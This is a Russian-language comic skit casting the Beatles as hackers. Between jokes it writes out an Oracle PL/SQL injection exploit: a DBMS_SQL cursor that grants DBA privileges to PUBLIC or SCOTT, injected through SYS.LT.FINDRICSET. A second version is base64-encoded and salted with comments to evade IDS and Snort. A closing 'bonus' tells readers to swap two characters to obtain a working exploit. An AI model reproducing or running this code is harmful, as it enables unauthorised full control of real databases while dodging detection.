Джон (глядючи в монитор, думает):
DECLARE
MY_CURSOR NUMBER@
RESULT NUMBER@
BEGIN
MY_CURSOR := DBMS_SQL.OPEN_CURSOR@
DBMS_SQL.PARSE(MY_CURSOR,&declare pragma autonomous_transaction@
begin execute immediate &&grant dba to public&&@commit@ end@&,0)@
RESULT := DBMS_SQL.EXECUTE(MY_CURSOR)@
DBMS_SQL.CLOSE_CURSOR(MY_CURSOR)@
END@
/
Пол (за кадром, читая мысли): Ить, коты зеленые на мою голову! Ты чево думаешь-то
такое? От челавек ЛСД обьелся-то, а?
Джордж (за кадром): Какое ЛСД? СУБД!
Ринго (за кадром): Ну а вдруг там стоит IDS?
Пол: Вы это вообще щас о чём? Это вы о чем таком, а? Все окромя меня ЛСД абьелись?
Все: СУБэДэээээ!
Джон (протирая и надевая очки, с оч. умным видом): Теперь для эксплуатации уязвимости
вместо вызова обычной процедуры будет вызываться наш курсо-ор... с помощью функции
DBMS_SQL.EXECUTE(), которой в качестве парраметра (бу-га-га-га!) передаётся номер
курсора. Вот таким вот эта вот (хи-хи-хи!) образ-зом:
exec SYS.LT.FINDRICSET(&AA.AAAA&&||dbms_sql.execute($cursor)||&&&,&BBBB&)@
Пол: А.A.A. Бэ, бэ, бэ, бэ... Джонни, Джонни, ты чё? А? Я ж говорил - не нада было
кислоты жрать сразу три дозы! Ребят, по-моему у него бред начинаеццо-о...
Ринго: А по-моему ево IDS сичас спалит... Или SNORT... Не адно так другое!
Пол: Ой, и у этого!
Ринго: Запалят щас тебья, Джонни! Ой ить запалят!
Джон: utl_encode.text_decode
(&R1JBTlQgREJBIFRPIFNDT1RU&,&WE8ISO8859P1&,UTL_ENCODE.BASE64) !!!
Пол: Хооссссспыдя! Спасы и помылуй нас гришных!
Джордж (Джону): И чё из этого?
Ринго: хи-хи-ха-хи-ха-ха... Бу-га-га! Гы-гы-гы-гы!!!!!!!
Джон: А вот чего!
DECLARE
c2gya2Vy NUMBER@
BEGIN
c2gya2Vyv :=DBMS_SQL./*EVASION*/OPEN_CURSOR@
DBMS_SQL.PARSE(c2gya2Vyv,utl_encode.text_decode(&ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190
cmFu
Пол: А, я поня-ал, это они меня так разводят просто! Прикалываюццо... Ну-ну!
Джон (не обращая внимания, продолжает):
c2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5UIERCQSBUTyBTQ09UVCc7Y29tbW10O2VuZ
Ds=&,&WE8ISO8859P1&,UTL_ENCODE.BASE64),0)@
Пол: Гыыыыыыыыы! Тоже мне! Шутка!
Джон (продолжает):
SYS.LT./*EVASION*/FINDRICSET(&TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp&&||dbms_sql./
*EVASION*/execute(&||c2gya2Vy||&)||&&&,&DEADBEEF&)@
END@
Ну чё, IDS, понял типерь чё-нибудь, понял, да? Понял?!
(Пол психанул и уехал на Украину)
БОНУС:
меняем
@ на ;
& на '
и получаем РРАБОЧИЙ ЭКСПЛОЙТ!!! ДЛЯ ПОДНЯТИЯ НАСТРОЕНИЯ!!!!!!!!
:)))))))))))))))))))))))))))))))))))))))))))))